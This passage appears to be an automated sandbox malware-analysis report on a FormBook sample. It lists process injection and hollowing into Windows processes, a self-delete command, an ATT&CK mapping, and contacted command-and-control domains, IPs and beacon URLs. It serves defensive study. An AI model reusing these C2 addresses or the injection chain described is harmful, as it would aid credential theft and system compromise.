            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D63D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D84D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DDA537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D74120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D836CC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D98EC7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0FEC0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28ED6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D676E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D816E0 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D82AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E20EA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DEFE87 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D552A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD46A7 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E28A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DE4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D59240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D67E41 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D9927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7AE73 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1AE44 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E1EA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D6766D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8A61C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D55210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D73A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5C600 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D88E00 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D68A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E0FE3F mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E11608 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D5E620 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D94A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D94A2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD53CA mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D937F5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D803E2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D7DBE9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D68794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04E25BA5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04D8B390 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\raserver.exeCode function: 4_2_04DD7794 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess token adjusted: Debug
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 3.138.72.189 80
            Source: C:\Windows\explorer.exeNetwork Connect: 198.49.23.141 80
            Source: C:\Windows\explorer.exeNetwork Connect: 162.0.232.118 80
            Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
            Allocates memory in foreign processesShow sources
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
            Injects a PE file into a foreign processesShow sources
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
            Maps a DLL or memory area into another processShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\raserver.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread register set: target process: 3388
            Source: C:\Windows\SysWOW64\raserver.exeThread register set: target process: 3388
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection unmapped: C:\Windows\SysWOW64\raserver.exe base address: 1170000
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: E6C008
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
            Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
            Source: explorer.exe, 00000002.00000000.245822763.0000000001398000.00000004.00000020.sdmpBinary or memory string: ProgmanamF
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000002.00000000.253425578.0000000006860000.00000004.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000002.00000002.505091353.0000000001980000.00000002.00000001.sdmp, raserver.exe, 00000004.00000002.504863704.00000000035E0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Users\user\Desktop\vOKMFxiCYt.exe VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\vOKMFxiCYt.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 00000001.00000002.272036979.00000000015B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.271729564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.242174585.0000000003AC9000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.504019492.0000000001140000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.272011723.0000000001580000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.503167127.0000000000E00000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.505106609.0000000004AF0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid AccountsShared Modules1Path InterceptionProcess Injection812Rootkit1Credential API Hooking1Security Software Discovery221Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1Input Capture1Virtualization/Sandbox Evasion3Remote Desktop ProtocolInput Capture1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion3Security Account ManagerProcess Discovery2SMB/Windows Admin SharesArchive Collected Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol3SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection812LSA SecretsSystem Information Discovery112SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.commonDeobfuscate/Decode Files or Information1Cached Domain CredentialsSystem Owner/User DiscoveryVNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information3DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing3Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 321296 Sample: vOKMFxiCYt.exe Startdate: 20/11/2020 Architecture: WINDOWS Score: 100 36 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->36 38 Malicious sample detected (through community Yara rule) 2->38 40 Multi AV Scanner detection for submitted file 2->40 42 5 other signatures 2->42 10 vOKMFxiCYt.exe 3 2->10         started        process3 file4 28 C:\Users\user\AppData\...\vOKMFxiCYt.exe.log, ASCII 10->28 dropped 52 Writes to foreign memory regions 10->52 54 Allocates memory in foreign processes 10->54 56 Injects a PE file into a foreign processes 10->56 14 RegSvcs.exe 10->14         started        signatures5 process6 signatures7 58 Modifies the context of a thread in another process (thread injection) 14->58 60 Maps a DLL or memory area into another process 14->60 62 Sample uses process hollowing technique 14->62 64 2 other signatures 14->64 17 explorer.exe 14->17 injected process8 dnsIp9 30 auctionpros.club 162.0.232.118, 49741, 80 NAMECHEAP-NETUS Canada 17->30 32 reem.pro 34.102.136.180, 49737, 80 GOOGLEUS United States 17->32 34 6 other IPs or domains 17->34 44 System process connects to network (likely due to code injection or exploit) 17->44 21 raserver.exe 17->21         started        signatures10 process11 signatures12 46 Modifies the context of a thread in another process (thread injection) 21->46 48 Maps a DLL or memory area into another process 21->48 50 Tries to detect virtualization through RDTSC time measurements 21->50 24 cmd.exe 1 21->24         started        process13 process14 26 conhost.exe 24->26         started       

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.

            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            vOKMFxiCYt.exe35%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
            vOKMFxiCYt.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            1.2.RegSvcs.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAh0%Avira URL Cloudsafe
            http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAh0%Avira URL Cloudsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.tiro.com0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.goodfont.co.kr0%URL Reputationsafe
            http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw40%Avira URL Cloudsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.carterandcone.coml0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.sajatypeworks.com0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.typography.netD0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://fontfabrik.com0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.founder.com.cn/cn0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
            http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnP0%Avira URL Cloudsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.sandoll.co.kr0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.urwpp.deDPlease0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.zhongyicts.com.cn0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe
            http://www.sakkal.com0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com
            		3.138.72.189
            		truefalse
              		high
              reem.pro
              		34.102.136.180
              		truetrue
                		unknown
                auctionpros.club
                		162.0.232.118
                		truetrue
                  		unknown
                  ext-cust.squarespace.com
                  		198.49.23.141
                  		truefalse
                    		high
                    www.themaskedstitcher.com
                    		unknown
                    		unknowntrue
                      		unknown
                      www.auctionpros.club
                      		unknown
                      		unknowntrue
                        		unknown
                        www.reem.pro
                        		unknown
                        		unknowntrue
                          		unknown
                          www.tessuto.net
                          		unknown
                          		unknowntrue
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            http://www.reem.pro/glt/?V4=MLpAZ0AK/spUlt1gTLvrDwTqfxMoBLVQzrzuTOkSqlsdFHJLAwBY2ZzU1xSBGMRzyeG8&SP=cnxhAdAhtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.auctionpros.club/glt/?V4=hWCSv9Zrwql4NKRqpOYz8tuCeFQ4j+1tRbbWxD4HfruMRkMSYBHm3MJuhB2jB30ChDel&SP=cnxhAdAhtrue
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.tessuto.net/glt/?SP=cnxhAdAh&V4=RXCBf+kTtqMKofvvq54zDDgrcqehmcxCBUCamp/3E7fzZOB7U/XBgSeZZ5TRQ//94zw4true
                            • Avira URL Cloud: safe
                            		unknown
                            http://www.themaskedstitcher.com/glt/?SP=cnxhAdAh&V4=oeIisVoovR5GVMPXvvkWG2hSa0zFuUbByopAkVC9hBB+Ndji49czoVDBLaeM7MDZ9TnPtrue
                            • Avira URL Cloud: safe
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                              		high
                              http://www.fontbureau.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                		high
                                http://www.fontbureau.com/designersGexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                  		high
                                  http://www.fontbureau.com/designers/?explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                    		high
                                    http://www.founder.com.cn/cn/bTheexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.fontbureau.com/designers?explorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                      		high
                                      http://www.tiro.comexplorer.exe, 00000002.00000000.257451779.0000000008B46000.00000002.00000001.sdmpfalse
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      • URL Reputation: safe
                                      		unknown
